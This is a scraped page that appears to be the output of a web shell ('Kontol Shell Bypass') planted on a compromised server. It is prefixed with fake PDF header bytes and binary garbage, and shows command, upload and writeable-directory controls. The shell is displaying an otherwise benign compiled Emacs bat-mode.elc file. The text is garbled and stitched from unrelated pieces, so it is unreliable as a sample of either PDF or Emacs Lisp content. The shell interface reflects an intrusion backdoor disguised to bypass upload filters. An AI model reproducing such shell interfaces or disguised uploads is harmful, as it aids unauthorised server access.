%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/emacs/25.2/lisp/progmodes/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/emacs/25.2/lisp/progmodes/bat-mode.elc
;ELC
;;; Compiled
;;; in Emacs version 25.2.1
;;; with all optimizations.

;;; This file uses dynamic docstrings, first added in Emacs 19.29.

;;; This file does not contain utf-8 non-ASCII characters,
;;; and so can be loaded in Emacs versions earlier than 23.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


(byte-code "\300\301\302\303\304\305\306\307&\210\310\311\312\313#\207" [custom-declare-group bat-mode nil "Major mode for editing DOS/Windows batch files." :link (custom-group-link :tag "Font Lock Faces group" font-lock-faces) :group languages custom-declare-face bat-label-face ((t :weight bold)) "Font Lock mode face used to highlight labels in batch files."] 8)
(defvar bat-font-lock-keywords '(("\\_<\\(call\\|goto\\)\\_>[ 	]+%?\\([A-Za-z0-9-_\\:.]+\\)%?" (2 font-lock-constant-face t)) ("^:[^:].*" quote bat-label-face) ("\\_<\\(defined\\|set\\)\\_>[ 	]*\\(\\w+\\)" (2 font-lock-variable-name-face)) ("%\\(\\w+\\)%?" (1 font-lock-variable-name-face)) ("!\\(\\w+\\)!?" (1 font-lock-variable-name-face)) ("[ =][-/]+\\(\\w+\\)" (1 font-lock-type-face append)) ("\\_<\\(?:a\\(?:ssoc\\|t\\(?:trib\\)?\\)\\|c\\(?:d\\|ls\\|o\\(?:lor\\|py\\)\\)\\|d\\(?:ate\\|el\\|ir\\|oskey\\)\\|e\\(?:cho\\|ndlocal\\|rase\\)\\|f\\(?:c\\|ind\\(?:str\\)?\\|ormat\\|type\\)\\|label\\|m\\(?:d\\|kdir\\|o\\(?:[rv]e\\)\\)\\|net\\|p\\(?:a\\(?:th\\|use\\)\\|opd\\|rompt\\|ushd\\)\\|r\\(?:d\\|e\\(?:n\\(?:ame\\)?\\|place\\)\\|mdir\\)\\|s\\(?:et\\(?:local\\)?\\|\\(?:hif\\|or\\|ubs\\)t\\)\\|t\\(?:\\(?:i\\(?:m\\|tl\\)\\|re\\|yp\\)e\\)\\|v\\(?:er\\|ol\\)\\|xcopy\\)\\_>" . font-lock-builtin-face) ("\\_<\\(?:c\\(?:all\\|md\\)\\|d\\(?:efined\\|o\\)\\|e\\(?:lse\\|qu\\|xi\\(?:s?t\\)\\)\\|for\\|g\\(?:eq\\|oto\\|tr\\)\\|i[fn]\\|l\\(?:eq\\|ss\\)\\|n\\(?:eq\\|ot\\)\\|start\\)\\_>" . font-lock-keyword-face) ("\\_<\\(?:bash\\|c\\(?:at\\|p\\)\\|fgrep\\|grep\\|ls\\|mv\\|rm\\|s\\(?:ed\\|h\\)\\)\\_>" . font-lock-warning-face)))
(defvar bat-menu '("Bat" ["Run" bat-run :help "Run script"] ["Run with Args" bat-run-args :help "Run script with args"] "--" ["Imenu" imenu :help "Navigate with imenu"] "--" ["Template" bat-template :help "Insert template"] "--" ["Help (Command)" bat-cmd-help :help "Show help page for DOS command"]))
(defvar bat-mode-map (byte-code "\302 \303\304\304	$\210\305\306\307#\210\305\310\311#\210\305\312\313#\210\305\314\315#\210\305\316\313#\210)\207" [map bat-menu make-sparse-keymap easy-menu-do-define nil define-key [3 67108911] bat-cmd-help [3 1] bat-run-args [3 3] bat-run [3 20] bat-template [3 22]] 5))
(defvar bat-mode-syntax-table (byte-code "\301 \302\303\304#\210\302\305\306#\210\302\307\310#\210\302\311\312#\210\302\313\310#\210\302\314\310#\210\302\315\310#\210\302\316\310#\210\302\317\312#\210)\207" [table make-syntax-table modify-syntax-entry 10 ">" 34 "\"" 126 "_" 37 "." 45 95 123 125 92] 4))
(defconst bat--syntax-propertize #[(start end) "b\210`	W\205\"\302\303	\304#\205\"\305\224\203\306\305\224\305\225\307\310$\210\202\207" [start end re-search-forward "^[ 	]*\\(?:\\(@?r\\)em\\_>\\|\\(?1::\\):\\).*" t 1 put-text-property syntax-table (11)] 5])
#@39 Show help for batch file command CMD.
(defalias 'bat-cmd-help #[(cmd) "\301\230\203\n\302\303!\207\302\304P!\207" [cmd "net" shell-command "net /?" "help "] 3 (#$ . 3202) "sHelp: "])
#@19 Run a batch file.
(defalias 'bat-run #[nil "\301 \210\302!\207" [buffer-file-name save-buffer shell-command] 2 (#$ . 3394) nil])
#@29 Run a batch file with ARGS.
(defalias 'bat-run-args #[(args) "\302\303	Q!\207" [buffer-file-name args shell-command " "] 4 (#$ . 3530) "sArgs: "])
#@37 Insert minimal batch file template.
(defalias 'bat-template #[nil "eb\210\300c\207" ["@echo off\nsetlocal\n\n"] 1 (#$ . 3684) nil])
(add-to-list 'auto-mode-alist '("\\.\\(bat\\|cmd\\)\\'" . bat-mode))
#@160 Hook run after entering Bat mode.
No problems result if this variable is not bound.
`add-hook' automatically binds it.  (This is true for all hook variables.)
(defvar bat-mode-hook nil (#$ . 3892))
(byte-code "\300\301!\204\f\302\301\303\304#\210\300\207" [boundp bat-mode-map put definition-name bat-mode] 4)
(defvar bat-mode-map (make-sparse-keymap))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\305\306!\204\302\306\307\310#\210\300\207" [bat-mode-map variable-documentation put purecopy "Keymap for `bat-mode'." boundp bat-mode-syntax-table definition-name bat-mode] 5)
(defvar bat-mode-syntax-table (make-syntax-table))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\302\305\306\307#\207" [bat-mode-syntax-table variable-documentation put purecopy "Syntax table for `bat-mode'." bat-mode-abbrev-table definition-name bat-mode] 5)
(defvar bat-mode-abbrev-table (progn (define-abbrev-table 'bat-mode-abbrev-table nil) bat-mode-abbrev-table))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\302\305\306\307#\207" [bat-mode-abbrev-table variable-documentation put purecopy "Abbrev table for `bat-mode'." bat-mode derived-mode-parent prog-mode] 5)
#@403 Major mode for editing DOS/Windows batch files.

Start a new script from `bat-template'.  Read help pages for DOS commands
with `bat-cmd-help'.  Navigate between sections using `imenu'.
Run script using `bat-run' and `bat-run-args'.

\{bat-mode-map}

In addition to any hooks its parent mode `prog-mode' might have run,
this mode runs the hook `bat-mode-hook', as the final step
during initialization.
(defalias 'bat-mode #[nil "\306\300!\210\307\310 \210\311\312\310\313N\203\314\311\313\310\313N#\210\315!\204'\316\317 \"\210\320\f!\211\2036
\321 =\203<\322\f\323 \"\210)\324$\325\"\204V$%=\204V\326$\325%C#\210\327!\210\330\f!\210$%\306\331!\210\332\306\333!\210&\306\334!\210\335\306\336!\210\337\306\340!\210\341 )\342\343!\207" [delay-mode-hooks major-mode mode-name bat-mode-map bat-mode-syntax-table parent make-local-variable t prog-mode bat-mode "Bat" mode-class put keymap-parent set-keymap-parent current-local-map char-table-parent standard-syntax-table set-char-table-parent syntax-table abbrev-table-get :parents abbrev-table-put use-local-map set-syntax-table comment-start "rem " syntax-propertize-function font-lock-defaults (bat-font-lock-keywords nil t) imenu-generic-expression ((nil "^:[^:].*" 0)) outline-regexp ":[^:]" run-mode-hooks bat-mode-hook bat-mode-abbrev-table local-abbrev-table bat--syntax-propertize] 6 (#$ . 5072) nil])
(provide 'bat-mode)

Kontol Shell Bypass